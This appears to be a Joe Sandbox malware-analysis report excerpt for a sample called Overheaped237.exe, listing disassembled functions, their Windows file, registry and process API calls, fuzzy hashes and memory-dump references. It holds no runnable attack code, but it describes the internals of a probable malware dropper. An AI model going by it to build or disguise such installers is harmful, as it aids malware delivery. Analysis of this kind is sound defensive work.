Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44

Function 00403064 Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403078

Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
SetFilePointer.KERNELBASE(0039DE6B,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E

Function 004021D2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406167: FindFirstFileA.KERNELBASE(771B3410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0), ref: 00406172
Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E

lstrlenA.KERNEL32 ref: 00402212
lstrlenA.KERNEL32(00000000), ref: 0040221C
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A

Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
Opcode Fuzzy Hash: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A

Function 004056BD Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405AB1: GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
Part of subcall function 00405AB1: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA

RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056D8
DeleteFileA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056E0
SetFileAttributesA.KERNEL32(?,00000000), ref: 004056F8

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction ID: 7218464210d320bbb7aaa7b2b3498e6226de7d0fc9260b199a665c24177db626
Opcode Fuzzy Hash: ecb533084f054dec527d8ee4002c22eb7271b0964ed621fa894de998c2c2fbf7
Instruction Fuzzy Hash: 4FE0E53150EA9157C2105731990C75F6AD8DF86324F840E36F955B21D0D7B94C068EAE

Function 00402F5C Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 00402F81

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
Instruction ID: 983d4f283b3a49842741e08d62faa859851885946f81c7e75766fedec90a3088
Opcode Fuzzy Hash: 318766a007564a5c8c6069328ff7bf9d8ddc724485930b67641b25b8ac31027b
Instruction Fuzzy Hash: 32319F70202219EFDF20EF56DD44A9B7BACEB00755F20803AF904E61D0D279DE40DBA9

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402440
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nst1CBF.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
Instruction ID: ea61b96732c3ecdd8e38099917432d45b641eb3d8d4d3075f09eb17731070f47
Opcode Fuzzy Hash: 408be7f7af0432980abd1dac26f88ffd518e424ecbfe51417bc02b193546086b
Instruction Fuzzy Hash: 7111A771905205FFDF14DF64C6889AEBBB4EF11349F20847FE141B62C0D2B84A45DB5A

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction ID: 8ec6bfb8ef4f3ff43576048fe9568e939b5e998f238dec90285f5c94a9fc96e2
Opcode Fuzzy Hash: 6f3fd260d9a20665192313664cef065be83871c58b0681ff97f62226ed226405
Instruction Fuzzy Hash: 2201F431B24210ABE7294B389E04B6A36A8F710314F11823BF911F66F1D7B8DC029B4D

Function 00402308 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 00402327
RegCloseKey.ADVAPI32(00000000), ref: 00402330

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: CloseDeleteOpenValue
String ID:
API String ID: 849931509-0
Opcode ID: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
Instruction ID: 87e18c8b9cd74d0bde17796df308dc93964f3544418e05dee947639aacfbea4d
Opcode Fuzzy Hash: 640ef84aaa5a4d1c7ae329859e4cea83c356e8d6a4fc0d45da6cfdbf294ae742
Instruction Fuzzy Hash: 4CF04473A00110AFDB10BFA48A4EAAE76799B50345F14443BF201B61C1D9BD4D12866D

Function 0040514E Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 0040515E

Part of subcall function 00404094: SendMessageA.USER32(000103EE,00000000,00000000,00000000), ref: 004040A6

CoUninitialize.COMBASE(00000404,00000000), ref: 004051AA

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
Instruction ID: 484cf87bc9531c098fcd3877696a47d73f7080a50005c66256059c60e8f5965f
Opcode Fuzzy Hash: a1e759c3ba7025077e10085eb26d18bfe45318352d138b018d477bc6a8fcf70b
Instruction Fuzzy Hash: FAF0F0F6A04201BAEA611B549804B1A72B0DBC4702F80813AFF04B62A1923D58428A1D

Function 00401567 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(000103FA), ref: 00401579
ShowWindow.USER32(000103F4), ref: 0040158E

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
Instruction ID: 7aa5c4f7886e8cba7d13c86f28d42bb7597e194b119905c56f16c38da31e44a6
Opcode Fuzzy Hash: 34ff18edd3c11d242e04e6dc0ee5230189bfa76ca485cef8dfffd048b0cc2ec8
Instruction Fuzzy Hash: 49E04F76B10104ABDB14DBA4EE8086E77A6E794310360453BD202B3694C2B49D459A68

Function 004061FC Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
GetProcAddress.KERNEL32(00000000,?), ref: 00406229

Part of subcall function 0040618E: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
Part of subcall function 0040618E: wsprintfA.USER32 ref: 004061DE
Part of subcall function 0040618E: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004061F2

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
Instruction ID: 835994d0d4e2d07c36af23a3dc0c9bac066575a7a99d708227b603b56203bf9f
Opcode Fuzzy Hash: 2c630675a567476a72db336401282eceef6d354bbdda173821c126d7c14613da
Instruction Fuzzy Hash: 7EE08632A04111BAD650B6745D0496B73AC9B84740302487EF906F2185E7389C3196AA

Function 00405AD6 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Overheaped237.exe,80000000,00000003), ref: 00405ADA
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

Memory Dump Source

Source File: 00000000.00000002.1427681979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1427654721.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427697173.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427711451.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1427922754.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Overheaped237.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction ID: 2e597581bf20324382b204af2e2b9293bc3b27f4d9e8cb915424ec39c2be7a6e
Opcode Fuzzy Hash: 4a69860c6089f1fb7fd455c1891d9cc54c05e48a968a67635bcc5e625bd0c43f
Instruction Fuzzy Hash: A7D09E31658201EFFF098F20DD16F2EBBA2EB84B00F10962CBA92941E0D6755815DB26

